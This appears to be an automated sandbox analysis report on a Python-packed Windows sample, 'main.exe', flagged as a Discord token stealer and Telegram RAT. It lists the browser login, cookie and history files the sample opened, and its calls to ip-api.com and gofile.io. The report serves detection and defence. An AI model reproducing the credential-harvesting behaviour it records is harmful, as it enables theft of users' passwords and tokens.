Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Queries volume information: C:\Users\user\Desktop\main.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF73339C5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF73339C5E0

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7333B6E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF7333B6E70

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected PRYSMAX STEALER

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected PRYSMAX STEALER

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Yara detected Generic Python Stealer

Source: Yara match

File source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
45.112.123.126	api.gofile.io	Singapore		16509	AMAZON-02US	false

Contacted Domains

Name	IP	Active
ip-api.com	208.95.112.1	true
api.gofile.io	45.112.123.126	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.gofile.io/servers	false		high

AV Detection

Antivirus / Scanner detection for submitted sample

Source: main.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: main.exe	ReversingLabs: Detection: 15%
Source: main.exe	Virustotal: Detection: 23%			Perma Link

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt

Jump to behavior

Source: main.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb0 source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bossl-modules\legacy.pdb source: main.exe, 00000000.00000002.2031067300.0000024BCD638000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2015446644.000001E891469000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,	0_2_00007FF733398840
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF733397800
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7333B2AE4

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 45.112.123.126 45.112.123.126

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Accept-Encoding: identityHost: api.gofile.ioUser-Agent: Python-urllib/3.11Connection: close
Source: global traffic	HTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: /Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /json/8.46.123.189?fields=192511 HTTP/1.1Host: ip-api.comUser-Agent: python-requests/2.32.3Accept-Encoding: gzip, deflate, br, zstdAccept: /Connection: keep-alive

Source: global traffic	DNS traffic detected: DNS query: api.gofile.io
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27
Source: main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27Pw
Source: main.exe, 00000002.00000003.2003283799.000001E893A4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025233362.000001E894ABD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005040977.000001E893A57000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994075095.000001E894B9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005756876.000001E894B9F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981923054.000001E894ABA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993380178.000001E894ABB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006444585.000001E894BB5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999164014.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2009804647.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986869706.000001E893C41000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973010642.000001E893C02000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004470843.000001E893C42000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796496956.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787561207.000001E893969000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996080402.000001E8939A3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980653418.000001E893998000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976495976.000001E89398C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787354247.000001E893A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
